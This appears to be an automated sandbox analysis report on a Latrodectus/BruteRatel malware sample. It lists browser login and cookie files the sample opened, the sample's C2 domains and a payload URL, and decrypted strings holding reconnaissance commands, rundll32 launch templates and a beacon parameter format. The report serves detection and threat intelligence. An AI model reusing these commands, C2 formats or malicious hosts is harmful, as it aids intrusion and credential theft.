Source: WMIC.exe, 00000021.00000002.3489207530.00000156669D1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669C5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488726294.00000156669CC000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487382704.00000156669CB000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488748596.00000156669D0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487514545.0000015666FA1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488702292.00000156669D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000002.3488807709.0000003146307000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000003.3488148854.0000015666F80000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489121828.00000156669B6000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487428020.00000156669B5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489100566.00000156669AA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487207652.00000156669A7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669A8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488168710.0000015666F81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected BruteRatel

Source: Yara match	File source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Contains functionality to steal Internet Explorer form passwords

Source: C:\Windows\explorer.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

8_2_0E458848

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected BruteRatel

Source: Yara match	File source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.68.89	dogirafer.com	United States	13335	CLOUDFLARENETUS	true
172.67.217.190	reateberam.com	United States	13335	CLOUDFLARENETUS	true
103.57.249.207	huanvn.com	India	17747	SITINETWORS-IN-APSITINETWORKSLIMITEDIN	true
94.232.43.224	vutarf.com	Russian Federation	44477	WELLWEBNL	true

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.214.172	true
vutarf.com	94.232.43.224	true
reateberam.com	172.67.217.190	true
huanvn.com	103.57.249.207	true
dogirafer.com	104.21.68.89	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reateberam.com/test/	true	Avira URL Cloud: malware	unknown
https://dogirafer.com/test/	true	Avira URL Cloud: safe	unknown
https://reateberam.com/files/stkm.bin	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4560D	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/t60G	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/X	Avira URL Cloud: Label: malware
Source: https://reateberam.com/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/w	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.bino	Avira URL Cloud: Label: malware
Source: https://reateberam.com/q	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.bin	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4560	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.binSL	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19	Avira URL Cloud: Label: malware
Source: https://reateberam.com/p	Avira URL Cloud: Label: malware

Found malware configuration

Source: 8.2.explorer.exe.3030000.0.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c ipconfig /all
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c systeminfo
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c nltest /domain_trusts
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c net view /all
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c net view /all /domain
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &ipconfig=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c net config workstation
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c whoami /groups
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &systeminfo=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &domain_trusts=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &domain_trusts_all=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_view_all_domain=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_view_all=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_group=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &wmic=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_config_ws=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_wmic_av=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &whoami_group=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "pid":
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%d",
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "proc":
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%s",
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "subproc": [
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &proclist=[
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "pid":
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%d",
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "proc":
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%s",
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "subproc": [
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &desklinks=[
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: .
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%s"
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Update_%x
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Custom_update
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: .dll
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: .exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Error
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: runnung
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %s/%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: front
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /files/
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Lambda
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Cookie:
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: POST
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: GET
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: curl/7.88.1
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: CLEARURL
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: URLS
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: COMMAND
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: ERROR
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: [{"data":"
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "}]
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &dpost=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: https://reateberam.com/test/
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: https://dogirafer.com/test/
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: \*.dll
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: AppData
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Desktop
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Startup
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Personal
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Local AppData
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: <html>
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: <!DOCTYPE
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %s%d.dll
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Content-Length: 0
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Content-Type: application/dns-message
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Content-Type: application/ocsp-request
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: 12345
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: 12345
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &stiller=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %s%d.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %x%x
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &mac=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %02x
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: :%02x
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &computername=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &domain=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: LogonTrigger
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: \Registry\Machine\
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: TimeTrigger
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: PT0H%02dM
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: PT0S
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: \update_data.dat

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7AC00 CryptStringToBinaryA,swprintf,LocalAlloc,swprintf,CryptStringToBinaryA,swprintf,CryptDecodeObjectEx,swprintf,LocalAlloc,swprintf,CryptDecodeObjectEx,swprintf,CryptImportPublicKeyInfoEx2,swprintf,LocalAlloc,swprintf,swprintf,swprintf,BCryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	3_2_00007FF8A8D7AC00
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7CEB0 BCryptOpenAlgorithmProvider,swprintf,BCryptGetProperty,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptExportKey,swprintf,	3_2_00007FF8A8D7CEB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7C3D0 BCryptOpenAlgorithmProvider,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapFree,BCryptDestroyHash,BCryptCloseAlgorithmProvider,	3_2_00007FF8A8D7C3D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7B720 swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptDecrypt,swprintf,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,BCryptDestroyKey,	3_2_00007FF8A8D7B720
Source: C:\Windows\explorer.exe	Code function: 8_2_0E455E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,	8_2_0E455E5C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E455FE4 CryptUnprotectData,	8_2_0E455FE4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E515C60 CryptUnprotectData,	8_2_0E515C60
Source: C:\Windows\explorer.exe	Code function: 8_2_0E458568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,	8_2_0E458568
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,	8_2_0E45453C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,	8_2_0E456078

Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
